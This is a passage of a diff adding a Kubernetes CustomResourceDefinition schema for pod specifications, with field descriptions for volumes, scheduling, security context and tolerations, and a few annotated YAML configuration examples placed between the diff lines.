+                    Will be truncated by the node if greater than
+                    4096 bytes. The total message length across all
+                    containers will be limited to 12kb. Defaults to
+                    /dev/termination-log. Cannot be updated.'
+                  type: string
+                terminationMessagePolicy:
+                  description: Indicate how the termination message
+                    should be populated. File will use the contents
+                    of terminationMessagePath to populate the container
+                    status message on both success and failure. FallbackToLogsOnError
+                    will use the last chunk of container log output
+                    if the termination message file is empty and the
+                    container exited with an error. The log output
+                    is limited to 2048 bytes or 80 lines, whichever
+                    is smaller. Defaults to File. Cannot be updated.
+                  type: string
+                tty:
+                  description: Whether this container should allocate
+                    a TTY for itself, also requires 'stdin' to be
+                    true. Default is false.
+                  type: boolean
+                volumeDevices:
+                  description: volumeDevices is the list of block
+                    devices to be used by the container.
+                  items:
+                    description: volumeDevice describes a mapping
+                      of a raw block device within a container.
+                    properties:
+                      devicePath:
+                        description: devicePath is the path inside
+                          of the container that the device will be
+                          mapped to.
+                        type: string
+                      name:
+                        description: name must match the name of a
+                          persistentVolumeClaim in the pod
+                        type: string
+                    required:
+                    - devicePath
+                    - name
+                    type: object
+                  type: array
+                volumeMounts:
+                  description: Pod volumes to mount into the container's
+                    filesystem. Cannot be updated.
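For slow-starting workloads, the startupProbe documented above is typically paired with a generous failureThreshold so the liveness probe does not kill the container during warm-up. A minimal sketch (the command and thresholds are illustrative, not part of this CRD):

startupProbe:
  exec:
    command: ["cat", "/tmp/healthy"]  # exec'd directly, not via a shell
  failureThreshold: 30                # tolerate up to 30 failed checks...
  periodSeconds: 10                   # ...i.e. roughly 300s of startup budget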
+ items: + description: VolumeMount describes a mounting + of a Volume within a container. + properties: + mountPath: + description: Path within the container at + which the volume should be mounted. Must + not contain ':'. + type: string + mountPropagation: + description: mountPropagation determines how + mounts are propagated from the host to container + and the other way around. When not set, + MountPropagationNone is used. This field + is beta in 1.10. + type: string + name: + description: This must match the Name of a + Volume. + type: string + readOnly: + description: Mounted read-only if true, read-write + otherwise (false or unspecified). Defaults + to false. + type: boolean + subPath: + description: Path within the volume from which + the container's volume should be mounted. + Defaults to "" (volume's root). + type: string + subPathExpr: + description: Expanded path within the volume + from which the container's volume should + be mounted. Behaves similarly to SubPath + but environment variable references $(VAR_NAME) + are expanded using the container's environment. + Defaults to "" (volume's root). SubPathExpr + and SubPath are mutually exclusive. + type: string + required: + - mountPath + - name + type: object + type: array + workingDir: + description: Container's working directory. If not + specified, the container runtime's default will + be used, which might be configured in the container + image. Cannot be updated. + type: string + required: + - name + type: object + type: array + nodeName: + description: NodeName is a request to schedule this pod + onto a specific node. If it is non-empty, the scheduler + simply schedules this pod onto that node, assuming that + it fits resource requirements. + type: string + nodeSelector: + additionalProperties: + type: string + description: 'NodeSelector is a selector which must be + true for the pod to fit on a node. Selector which must + match a node''s labels for the pod to be scheduled on + that node. More info: https://kubernetes.io/docs/concepts/configuration/assign-pod-node/' + type: object + x-kubernetes-map-type: atomic + overhead: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Overhead represents the resource overhead + associated with running a pod for a given RuntimeClass. + This field will be autopopulated at admission time by + the RuntimeClass admission controller. If the RuntimeClass + admission controller is enabled, overhead must not be + set in Pod create requests. The RuntimeClass admission + controller will reject Pod create requests which have + the overhead already set. If RuntimeClass is configured + and selected in the PodSpec, Overhead will be set to + the value defined in the corresponding RuntimeClass, + otherwise it will remain unset and treated as zero. + More info: https://git.k8s.io/enhancements/keps/sig-node/688-pod-overhead/README.md + This field is beta-level as of Kubernetes v1.18, and + is only honored by servers that enable the PodOverhead + feature.' + type: object + preemptionPolicy: + description: PreemptionPolicy is the Policy for preempting + pods with lower priority. One of Never, PreemptLowerPriority. + Defaults to PreemptLowerPriority if unset. This field + is beta-level, gated by the NonPreemptingPriority feature-gate. + type: string + priority: + description: The priority value. 
Various system components + use this field to find the priority of the pod. When + Priority Admission Controller is enabled, it prevents + users from setting this field. The admission controller + populates this field from PriorityClassName. The higher + the value, the higher the priority. + format: int32 + type: integer + priorityClassName: + description: If specified, indicates the pod's priority. + "system-node-critical" and "system-cluster-critical" + are two special keywords which indicate the highest + priorities with the former being the highest priority. + Any other name must be defined by creating a PriorityClass + object with that name. If not specified, the pod priority + will be default or zero if there is no default. + type: string + readinessGates: + description: 'If specified, all readiness gates will be + evaluated for pod readiness. A pod is ready when all + its containers are ready AND all conditions specified + in the readiness gates have status equal to "True" More + info: https://git.k8s.io/enhancements/keps/sig-network/580-pod-readiness-gates' + items: + description: PodReadinessGate contains the reference + to a pod condition + properties: + conditionType: + description: ConditionType refers to a condition + in the pod's condition list with matching type. + type: string + required: + - conditionType + type: object + type: array + restartPolicy: + description: 'Restart policy for all containers within + the pod. One of Always, OnFailure, Never. Default to + Always. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#restart-policy' + type: string + runtimeClassName: + description: 'RuntimeClassName refers to a RuntimeClass + object in the node.k8s.io group, which should be used + to run this pod. If no RuntimeClass resource matches + the named class, the pod will not be run. If unset or + empty, the "legacy" RuntimeClass will be used, which + is an implicit class with an empty definition that uses + the default runtime handler. More info: https://git.k8s.io/enhancements/keps/sig-node/585-runtime-class + This is a beta feature as of Kubernetes v1.14.' + type: string + schedulerName: + description: If specified, the pod will be dispatched + by specified scheduler. If not specified, the pod will + be dispatched by default scheduler. + type: string + securityContext: + description: 'SecurityContext holds pod-level security + attributes and common container settings. Optional: + Defaults to empty. See type description for default + values of each field.' + properties: + fsGroup: + description: "A special supplemental group that applies + to all containers in a pod. Some volume types allow + the Kubelet to change the ownership of that volume + to be owned by the pod: \n 1. The owning GID will + be the FSGroup 2. The setgid bit is set (new files + created in the volume will be owned by FSGroup) + 3. The permission bits are OR'd with rw-rw---- \n + If unset, the Kubelet will not modify the ownership + and permissions of any volume." + format: int64 + type: integer + fsGroupChangePolicy: + description: 'fsGroupChangePolicy defines behavior + of changing ownership and permission of the volume + before being exposed inside Pod. This field will + only apply to volume types which support fsGroup + based ownership(and permissions). It will have no + effect on ephemeral volume types such as: secret, + configmaps and emptydir. Valid values are "OnRootMismatch" + and "Always". If not specified, "Always" is used.' 
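By way of illustration, the pod-level fsGroup fields above combine as follows (the GID is an arbitrary example):

securityContext:                       # pod-level PodSecurityContext
  fsGroup: 2000                        # supported volumes become group-owned by GID 2000
  fsGroupChangePolicy: OnRootMismatch  # skip the recursive chown when ownership already matches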
+ type: string + runAsGroup: + description: The GID to run the entrypoint of the + container process. Uses runtime default if unset. + May also be set in SecurityContext. If set in both + SecurityContext and PodSecurityContext, the value + specified in SecurityContext takes precedence for + that container. + format: int64 + type: integer + runAsNonRoot: + description: Indicates that the container must run + as a non-root user. If true, the Kubelet will validate + the image at runtime to ensure that it does not + run as UID 0 (root) and fail to start the container + if it does. If unset or false, no such validation + will be performed. May also be set in SecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes precedence. + type: boolean + runAsUser: + description: The UID to run the entrypoint of the + container process. Defaults to user specified in + image metadata if unspecified. May also be set in + SecurityContext. If set in both SecurityContext + and PodSecurityContext, the value specified in SecurityContext + takes precedence for that container. + format: int64 + type: integer + seLinuxOptions: + description: The SELinux context to be applied to + all containers. If unspecified, the container runtime + will allocate a random SELinux context for each + container. May also be set in SecurityContext. If + set in both SecurityContext and PodSecurityContext, + the value specified in SecurityContext takes precedence + for that container. + properties: + level: + description: Level is SELinux level label that + applies to the container. + type: string + role: + description: Role is a SELinux role label that + applies to the container. + type: string + type: + description: Type is a SELinux type label that + applies to the container. + type: string + user: + description: User is a SELinux user label that + applies to the container. + type: string + type: object + seccompProfile: + description: The seccomp options to use by the containers + in this pod. + properties: + localhostProfile: + description: localhostProfile indicates a profile + defined in a file on the node should be used. + The profile must be preconfigured on the node + to work. Must be a descending path, relative + to the kubelet's configured seccomp profile + location. Must only be set if type is "Localhost". + type: string + type: + description: "type indicates which kind of seccomp + profile will be applied. Valid options are: + \n Localhost - a profile defined in a file on + the node should be used. RuntimeDefault - the + container runtime default profile should be + used. Unconfined - no profile should be applied." + type: string + required: + - type + type: object + supplementalGroups: + description: A list of groups applied to the first + process run in each container, in addition to the + container's primary GID. If unspecified, no groups + will be added to any container. + items: + format: int64 + type: integer + type: array + sysctls: + description: Sysctls hold a list of namespaced sysctls + used for the pod. Pods with unsupported sysctls + (by the container runtime) might fail to launch. + items: + description: Sysctl defines a kernel parameter to + be set + properties: + name: + description: Name of a property to set + type: string + value: + description: Value of a property to set + type: string + required: + - name + - value + type: object + type: array + windowsOptions: + description: The Windows specific settings applied + to all containers. 
If unspecified, the options within
+                a container's SecurityContext will be used. If set
+                in both SecurityContext and PodSecurityContext,
+                the value specified in SecurityContext takes precedence.
+              properties:
+                gmsaCredentialSpec:
+                  description: GMSACredentialSpec is where the GMSA
+                    admission webhook (https://github.com/kubernetes-sigs/windows-gmsa)
+                    inlines the contents of the GMSA credential
+                    spec named by the GMSACredentialSpecName field.
+                  type: string
+                gmsaCredentialSpecName:
+                  description: GMSACredentialSpecName is the name
+                    of the GMSA credential spec to use.
+                  type: string
+                hostProcess:
+                  description: HostProcess determines if a container
+                    should be run as a 'Host Process' container.
+                    This field is alpha-level and will only be honored
+                    by components that enable the WindowsHostProcessContainers
+                    feature flag. Setting this field without the
+                    feature flag will result in errors when validating
+                    the Pod. All of a Pod's containers must have
+                    the same effective HostProcess value (it is
+                    not allowed to have a mix of HostProcess containers
+                    and non-HostProcess containers). In addition,
+                    if HostProcess is true then HostNetwork must
+                    also be set to true.
+                  type: boolean
+                runAsUserName:
+                  description: The UserName in Windows to run the
+                    entrypoint of the container process. Defaults
+                    to the user specified in image metadata if unspecified.
+                    May also be set in PodSecurityContext. If set
+                    in both SecurityContext and PodSecurityContext,
+                    the value specified in SecurityContext takes
+                    precedence.
+                  type: string
+                type: object
+            type: object
+          serviceAccount:
+            description: 'DeprecatedServiceAccount is a deprecated
+              alias for ServiceAccountName. Deprecated: Use serviceAccountName
+              instead.'
+            type: string
+          serviceAccountName:
+            description: 'ServiceAccountName is the name of the ServiceAccount
+              to use to run this pod. More info: https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/'
+            type: string
+          setHostnameAsFQDN:
+            description: If true, the pod's hostname will be configured
+              as the pod's FQDN, rather than the leaf name (the default).
+              In Linux containers, this means setting the FQDN in
+              the hostname field of the kernel (the nodename field
+              of struct utsname). In Windows containers, this means
+              setting the registry value of hostname for the registry
+              key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters
+              to FQDN. If a pod does not have FQDN, this has no effect.
+              Default to false.
+            type: boolean
+          shareProcessNamespace:
+            description: 'Share a single process namespace between
+              all of the containers in a pod. When this is set containers
+              will be able to view and signal processes from other
+              containers in the same pod, and the first process in
+              each container will not be assigned PID 1. HostPID and
+              ShareProcessNamespace cannot both be set. Optional:
+              Default to false.'
+            type: boolean
+          subdomain:
+            description: If specified, the fully qualified Pod hostname
+              will be "<hostname>.<subdomain>.<pod namespace>.svc.<cluster
+              domain>". If not specified, the pod will not have a
+              domainname at all.
+            type: string
+          terminationGracePeriodSeconds:
+            description: Optional duration in seconds the pod needs
+              to terminate gracefully. May be decreased in delete
+              request. Value must be non-negative integer. The value
+              zero indicates stop immediately via the kill signal
+              (no opportunity to shut down). If this value is nil,
+              the default grace period will be used instead.
The grace
+              period is the duration in seconds after the processes
+              running in the pod are sent a termination signal and
+              the time when the processes are forcibly halted with
+              a kill signal. Set this value longer than the expected
+              cleanup time for your process. Defaults to 30 seconds.
+            format: int64
+            type: integer
+          tolerations:
+            description: If specified, the pod's tolerations.
+            items:
+              description: The pod this Toleration is attached to
+                tolerates any taint that matches the triple <key,value,effect>
+                using the matching operator <operator>.
+              properties:
+                effect:
+                  description: Effect indicates the taint effect to
+                    match. Empty means match all taint effects. When
+                    specified, allowed values are NoSchedule, PreferNoSchedule
+                    and NoExecute.
+                  type: string
+                key:
+                  description: Key is the taint key that the toleration
+                    applies to. Empty means match all taint keys.
+                    If the key is empty, operator must be Exists;
+                    this combination means to match all values and
+                    all keys.
+                  type: string
+                operator:
+                  description: Operator represents a key's relationship
+                    to the value. Valid operators are Exists and Equal.
+                    Defaults to Equal. Exists is equivalent to wildcard
+                    for value, so that a pod can tolerate all taints
+                    of a particular category.
+                  type: string
+                tolerationSeconds:
+                  description: TolerationSeconds represents the period
+                    of time the toleration (which must be of effect
+                    NoExecute, otherwise this field is ignored) tolerates
+                    the taint. By default, it is not set, which means
+                    tolerate the taint forever (do not evict). Zero
+                    and negative values will be treated as 0 (evict
+                    immediately) by the system.
+                  format: int64
+                  type: integer
+                value:
+                  description: Value is the taint value the toleration
+                    matches to. If the operator is Exists, the value
+                    should be empty, otherwise just a regular string.
+                  type: string
+              type: object
+            type: array
+          topologySpreadConstraints:
+            description: TopologySpreadConstraints describes how a
+              group of pods ought to spread across topology domains.
+              Scheduler will schedule pods in a way which abides by
+              the constraints. All topologySpreadConstraints are ANDed.
+            items:
+              description: TopologySpreadConstraint specifies how
+                to spread matching pods among the given topology.
+              properties:
+                labelSelector:
+                  description: LabelSelector is used to find matching
+                    pods. Pods that match this label selector are
+                    counted to determine the number of pods in their
+                    corresponding topology domain.
+                  properties:
+                    matchExpressions:
+                      description: matchExpressions is a list of label
+                        selector requirements. The requirements are
+                        ANDed.
+                      items:
+                        description: A label selector requirement
+                          is a selector that contains values, a key,
+                          and an operator that relates the key and
+                          values.
+                        properties:
+                          key:
+                            description: key is the label key that
+                              the selector applies to.
+                            type: string
+                          operator:
+                            description: operator represents a key's
+                              relationship to a set of values. Valid
+                              operators are In, NotIn, Exists and
+                              DoesNotExist.
+                            type: string
+                          values:
+                            description: values is an array of string
+                              values. If the operator is In or NotIn,
+                              the values array must be non-empty.
+                              If the operator is Exists or DoesNotExist,
+                              the values array must be empty. This
+                              array is replaced during a strategic
+                              merge patch.
+                            items:
+                              type: string
+                            type: array
+                        required:
+                        - key
+                        - operator
+                        type: object
+                      type: array
+                    matchLabels:
+                      additionalProperties:
+                        type: string
+                      description: matchLabels is a map of {key,value}
+                        pairs.
A single {key,value} in the matchLabels
+                        map is equivalent to an element of matchExpressions,
+                        whose key field is "key", the operator is
+                        "In", and the values array contains only "value".
+                        The requirements are ANDed.
+                      type: object
+                  type: object
+                maxSkew:
+                  description: 'MaxSkew describes the degree to which
+                    pods may be unevenly distributed. When `whenUnsatisfiable=DoNotSchedule`,
+                    it is the maximum permitted difference between
+                    the number of matching pods in the target topology
+                    and the global minimum. For example, in a 3-zone
+                    cluster, MaxSkew is set to 1, and pods with the
+                    same labelSelector spread as 1/1/0: | zone1 |
+                    zone2 | zone3 | |  P   |  P   |      | - if
+                    MaxSkew is 1, incoming pod can only be scheduled
+                    to zone3 to become 1/1/1; scheduling it onto zone1(zone2)
+                    would make the ActualSkew(2-0) on zone1(zone2)
+                    violate MaxSkew(1). - if MaxSkew is 2, incoming
+                    pod can be scheduled onto any zone. When `whenUnsatisfiable=ScheduleAnyway`,
+                    it is used to give higher precedence to topologies
+                    that satisfy it. It''s a required field. Default
+                    value is 1 and 0 is not allowed.'
+                  format: int32
+                  type: integer
+                topologyKey:
+                  description: TopologyKey is the key of node labels.
+                    Nodes that have a label with this key and identical
+                    values are considered to be in the same topology.
+                    We consider each <key, value> as a "bucket", and
+                    try to put balanced number of pods into each bucket.
+                    It's a required field.
+                  type: string
+                whenUnsatisfiable:
+                  description: 'WhenUnsatisfiable indicates how to
+                    deal with a pod if it doesn''t satisfy the spread
+                    constraint. - DoNotSchedule (default) tells the
+                    scheduler not to schedule it. - ScheduleAnyway
+                    tells the scheduler to schedule the pod in any
+                    location, but giving higher precedence to topologies
+                    that would help reduce the skew. A constraint
+                    is considered "Unsatisfiable" for an incoming
+                    pod if and only if every possible node assignment
+                    for that pod would violate "MaxSkew" on some topology.
+                    For example, in a 3-zone cluster, MaxSkew is set
+                    to 1, and pods with the same labelSelector spread
+                    as 3/1/1: | zone1 | zone2 | zone3 | | P P P |  P  |  P  |
+                    If WhenUnsatisfiable is set to DoNotSchedule,
+                    incoming pod can only be scheduled to zone2(zone3)
+                    to become 3/2/1(3/1/2) as ActualSkew(2-1) on zone2(zone3)
+                    satisfies MaxSkew(1). In other words, the cluster
+                    can still be imbalanced, but scheduler won''t
+                    make it *more* imbalanced. It''s a required field.'
+                  type: string
+              required:
+              - maxSkew
+              - topologyKey
+              - whenUnsatisfiable
+              type: object
+            type: array
+            x-kubernetes-list-map-keys:
+            - topologyKey
+            - whenUnsatisfiable
+            x-kubernetes-list-type: map
+          volumes:
+            description: 'List of volumes that can be mounted by containers
+              belonging to the pod. More info: https://kubernetes.io/docs/concepts/storage/volumes'
+            items:
+              description: Volume represents a named volume in a pod
+                that may be accessed by any container in the pod.
+              properties:
+                awsElasticBlockStore:
+                  description: 'AWSElasticBlockStore represents an
+                    AWS Disk resource that is attached to a kubelet''s
+                    host machine and then exposed to the pod. More
+                    info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore'
+                  properties:
+                    fsType:
+                      description: 'Filesystem type of the volume
+                        that you want to mount. Tip: Ensure that the
+                        filesystem type is supported by the host operating
+                        system. Examples: "ext4", "xfs", "ntfs". Implicitly
+                        inferred to be "ext4" if unspecified.
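Read together, the topology spread fields above could be set like this to spread replicas evenly across zones (the pod label is a hypothetical example):

topologySpreadConstraints:
- maxSkew: 1                                 # allow at most 1 pod of imbalance between zones
  topologyKey: topology.kubernetes.io/zone   # each zone label value is one "bucket"
  whenUnsatisfiable: DoNotSchedule
  labelSelector:
    matchLabels:
      app: example                           # hypothetical label selecting the replicas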
More + info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore + TODO: how do we prevent errors in the filesystem + from compromising the machine' + type: string + partition: + description: 'The partition in the volume that + you want to mount. If omitted, the default + is to mount by volume name. Examples: For + volume /dev/sda1, you specify the partition + as "1". Similarly, the volume partition for + /dev/sda is "0" (or you can leave the property + empty).' + format: int32 + type: integer + readOnly: + description: 'Specify "true" to force and set + the ReadOnly property in VolumeMounts to "true". + If omitted, the default is "false". More info: + https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore' + type: boolean + volumeID: + description: 'Unique ID of the persistent disk + resource in AWS (Amazon EBS volume). More + info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore' + type: string + required: + - volumeID + type: object + azureDisk: + description: AzureDisk represents an Azure Data + Disk mount on the host and bind mount to the pod. + properties: + cachingMode: + description: 'Host Caching mode: None, Read + Only, Read Write.' + type: string + diskName: + description: The Name of the data disk in the + blob storage + type: string + diskURI: + description: The URI the data disk in the blob + storage + type: string + fsType: + description: Filesystem type to mount. Must + be a filesystem type supported by the host + operating system. Ex. "ext4", "xfs", "ntfs". + Implicitly inferred to be "ext4" if unspecified. + type: string + kind: + description: 'Expected values Shared: multiple + blob disks per storage account Dedicated: + single blob disk per storage account Managed: + azure managed data disk (only in managed availability + set). defaults to shared' + type: string + readOnly: + description: Defaults to false (read/write). + ReadOnly here will force the ReadOnly setting + in VolumeMounts. + type: boolean + required: + - diskName + - diskURI + type: object + azureFile: + description: AzureFile represents an Azure File + Service mount on the host and bind mount to the + pod. + properties: + readOnly: + description: Defaults to false (read/write). + ReadOnly here will force the ReadOnly setting + in VolumeMounts. + type: boolean + secretName: + description: the name of secret that contains + Azure Storage Account Name and Key + type: string + shareName: + description: Share Name + type: string + required: + - secretName + - shareName + type: object + cephfs: + description: CephFS represents a Ceph FS mount on + the host that shares a pod's lifetime + properties: + monitors: + description: 'Required: Monitors is a collection + of Ceph monitors More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + items: + type: string + type: array + path: + description: 'Optional: Used as the mounted + root, rather than the full Ceph tree, default + is /' + type: string + readOnly: + description: 'Optional: Defaults to false (read/write). + ReadOnly here will force the ReadOnly setting + in VolumeMounts. 
More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + type: boolean + secretFile: + description: 'Optional: SecretFile is the path + to key ring for User, default is /etc/ceph/user.secret + More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + type: string + secretRef: + description: 'Optional: SecretRef is reference + to the authentication secret for User, default + is empty. More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + type: object + user: + description: 'Optional: User is the rados user + name, default is admin More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + type: string + required: + - monitors + type: object + cinder: + description: 'Cinder represents a cinder volume + attached and mounted on kubelets host machine. + More info: https://examples.k8s.io/mysql-cinder-pd/README.md' + properties: + fsType: + description: 'Filesystem type to mount. Must + be a filesystem type supported by the host + operating system. Examples: "ext4", "xfs", + "ntfs". Implicitly inferred to be "ext4" if + unspecified. More info: https://examples.k8s.io/mysql-cinder-pd/README.md' + type: string + readOnly: + description: 'Optional: Defaults to false (read/write). + ReadOnly here will force the ReadOnly setting + in VolumeMounts. More info: https://examples.k8s.io/mysql-cinder-pd/README.md' + type: boolean + secretRef: + description: 'Optional: points to a secret object + containing parameters used to connect to OpenStack.' + properties: + name: + description: 'Name of the referent. More + info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names + TODO: Add other useful fields. apiVersion, + kind, uid?' + type: string + type: object + volumeID: + description: 'volume id used to identify the + volume in cinder. More info: https://examples.k8s.io/mysql-cinder-pd/README.md' + type: string + required: + - volumeID + type: object + configMap: + description: ConfigMap represents a configMap that + should populate this volume + properties: + defaultMode: + description: 'Optional: mode bits used to set + permissions on created files by default. Must + be an octal value between 0000 and 0777 or + a decimal value between 0 and 511. YAML accepts + both octal and decimal values, JSON requires + decimal values for mode bits. Defaults to + 0644. Directories within the path are not + affected by this setting. This might be in + conflict with other options that affect the + file mode, like fsGroup, and the result can + be other mode bits set.' + format: int32 + type: integer + items: + description: If unspecified, each key-value + pair in the Data field of the referenced ConfigMap + will be projected into the volume as a file + whose name is the key and content is the value. + If specified, the listed keys will be projected + into the specified paths, and unlisted keys + will not be present. If a key is specified + which is not present in the ConfigMap, the + volume setup will error unless it is marked + optional. Paths must be relative and may not + contain the '..' path or start with '..'. + items: + description: Maps a string key to a path within + a volume. + properties: + key: + description: The key to project. 
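A sketch of how the configMap volume fields above fit together (the ConfigMap and key names are hypothetical):

volumes:
- name: config
  configMap:
    name: app-config          # hypothetical ConfigMap in the pod's namespace
    defaultMode: 0444         # octal in YAML; a JSON manifest must use decimal (292)
    items:
    - key: settings.json      # project only this key...
      path: settings.json     # ...to this relative path inside the volume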
+                            type: string
+                          mode:
+                            description: 'Optional: mode bits used
+                              to set permissions on this file. Must
+                              be an octal value between 0000 and 0777
+                              or a decimal value between 0 and 511.
+                              YAML accepts both octal and decimal
+                              values, JSON requires decimal values
+                              for mode bits. If not specified, the
+                              volume defaultMode will be used. This
+                              might be in conflict with other options
+                              that affect the file mode, like fsGroup,
+                              and the result can be other mode bits
+                              set.'
+                            format: int32
+                            type: integer
+                          path:
+                            description: The relative path of the
+                              file to map the key to. May not be an
+                              absolute path. May not contain the path
+                              element '..'. May not start with the
+                              string '..'.
+                            type: string
+                        required:
+                        - key
+                        - path
+                        type: object
+                      type: array
+                    name:
+                      description: 'Name of the referent. More info:
+                        https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
+                        TODO: Add other useful fields. apiVersion,
+                        kind, uid?'
+                      type: string
+                    optional:
+                      description: Specify whether the ConfigMap or
+                        its keys must be defined
+                      type: boolean
+                  type: object
+                csi:
+                  description: CSI (Container Storage Interface) represents
+                    ephemeral storage that is handled by certain external
+                    CSI drivers (Beta feature).
+                  properties:
+                    driver:
+                      description: Driver is the name of the CSI driver
+                        that handles this volume. Consult with your
+                        admin for the correct name as registered in
+                        the cluster.
+                      type: string
+                    fsType:
+                      description: Filesystem type to mount. Ex. "ext4",
+                        "xfs", "ntfs". If not provided, the empty
+                        value is passed to the associated CSI driver
+                        which will determine the default filesystem
+                        to apply.
+                      type: string
+                    nodePublishSecretRef:
+                      description: NodePublishSecretRef is a reference
+                        to the secret object containing sensitive
+                        information to pass to the CSI driver to complete
+                        the CSI NodePublishVolume and NodeUnpublishVolume
+                        calls. This field is optional, and may be
+                        empty if no secret is required. If the secret
+                        object contains more than one secret, all
+                        secret references are passed.
+                      properties:
+                        name:
+                          description: 'Name of the referent. More
+                            info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
+                            TODO: Add other useful fields. apiVersion,
+                            kind, uid?'
+                          type: string
+                      type: object
+                    readOnly:
+                      description: Specifies a read-only configuration
+                        for the volume. Defaults to false (read/write).
+                      type: boolean
+                    volumeAttributes:
+                      additionalProperties:
+                        type: string
+                      description: VolumeAttributes stores driver-specific
+                        properties that are passed to the CSI driver.
+                        Consult your driver's documentation for supported
+                        values.
+                      type: object
+                  required:
+                  - driver
+                  type: object
+                downwardAPI:
+                  description: DownwardAPI represents downward API
+                    about the pod that should populate this volume
+                  properties:
+                    defaultMode:
+                      description: 'Optional: mode bits used to set
+                        permissions on created files by default. Must
+                        be an octal value between 0000 and 0777 or
+                        a decimal value between 0 and 511. YAML accepts
+                        both octal and decimal values, JSON requires
+                        decimal values for mode bits. Defaults to
+                        0644. Directories within the path are not
+                        affected by this setting. This might be in
+                        conflict with other options that affect the
+                        file mode, like fsGroup, and the result can
+                        be other mode bits set.'
+ format: int32 + type: integer + items: + description: Items is a list of downward API + volume file + items: + description: DownwardAPIVolumeFile represents + information to create the file containing + the pod field + properties: + fieldRef: + description: 'Required: Selects a field + of the pod: only annotations, labels, + name and namespace are supported.' + properties: + apiVersion: + description: Version of the schema + the FieldPath is written in terms + of, defaults to "v1". + type: string + fieldPath: + description: Path of the field to + select in the specified API version. + type: string + required: + - fieldPath + type: object + mode: + description: 'Optional: mode bits used + to set permissions on this file, must + be an octal value between 0000 and 0777 + or a decimal value between 0 and 511. + YAML accepts both octal and decimal + values, JSON requires decimal values + for mode bits. If not specified, the + volume defaultMode will be used. This + might be in conflict with other options + that affect the file mode, like fsGroup, + and the result can be other mode bits + set.' + format: int32 + type: integer + path: + description: 'Required: Path is the relative + path name of the file to be created. + Must not be absolute or contain the + ''..'' path. Must be utf-8 encoded. + The first item of the relative path + must not start with ''..''' + type: string + resourceFieldRef: + description: 'Selects a resource of the + container: only resources limits and + requests (limits.cpu, limits.memory, + requests.cpu and requests.memory) are + currently supported.' + properties: + containerName: + description: 'Container name: required + for volumes, optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the output + format of the exposed resources, + defaults to "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: resource to + select' + type: string + required: + - resource + type: object + required: + - path + type: object + type: array + type: object + emptyDir: + description: 'EmptyDir represents a temporary directory + that shares a pod''s lifetime. More info: https://kubernetes.io/docs/concepts/storage/volumes#emptydir' + properties: + medium: + description: 'What type of storage medium should + back this directory. The default is "" which + means to use the node''s default medium. Must + be an empty string (default) or Memory. More + info: https://kubernetes.io/docs/concepts/storage/volumes#emptydir' + type: string + sizeLimit: + anyOf: + - type: integer + - type: string + description: 'Total amount of local storage + required for this EmptyDir volume. The size + limit is also applicable for memory medium. + The maximum usage on memory medium EmptyDir + would be the minimum value between the SizeLimit + specified here and the sum of memory limits + of all containers in a pod. The default is + nil which means that the limit is undefined. + More info: http://kubernetes.io/docs/user-guide/volumes#emptydir' + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + type: object + ephemeral: + description: "Ephemeral represents a volume that + is handled by a cluster storage driver. 
The volume's
+                    lifecycle is tied to the pod that defines it -
+                    it will be created before the pod starts, and
+                    deleted when the pod is removed. \n Use this if:
+                    a) the volume is only needed while the pod runs,
+                    b) features of normal volumes like restoring from
+                    snapshot or capacity tracking are needed, c)
+                    the storage driver is specified through a storage
+                    class, and d) the storage driver supports dynamic
+                    volume provisioning through a PersistentVolumeClaim
+                    (see EphemeralVolumeSource for more information
+                    on the connection between this volume type and
+                    PersistentVolumeClaim). \n Use PersistentVolumeClaim
+                    or one of the vendor-specific APIs for volumes
+                    that persist for longer than the lifecycle of
+                    an individual pod. \n Use CSI for light-weight
+                    local ephemeral volumes if the CSI driver is meant
+                    to be used that way - see the documentation of
+                    the driver for more information. \n A pod can
+                    use both types of ephemeral volumes and persistent
+                    volumes at the same time. \n This is a beta feature
+                    and only available when the GenericEphemeralVolume
+                    feature gate is enabled."
+                  properties:
+                    volumeClaimTemplate:
+                      description: "Will be used to create a stand-alone
+                        PVC to provision the volume. The pod in which
+                        this EphemeralVolumeSource is embedded will
+                        be the owner of the PVC, i.e. the PVC will
+                        be deleted together with the pod. The name
+                        of the PVC will be `<pod name>-<volume name>`
+                        where `<volume name>` is the name from the
+                        `PodSpec.Volumes` array entry. Pod validation
+                        will reject the pod if the concatenated name
+                        is not valid for a PVC (for example, too long).
+                        \n An existing PVC with that name that is
+                        not owned by the pod will *not* be used for
+                        the pod to avoid using an unrelated volume
+                        by mistake. Starting the pod is then blocked
+                        until the unrelated PVC is removed. If such
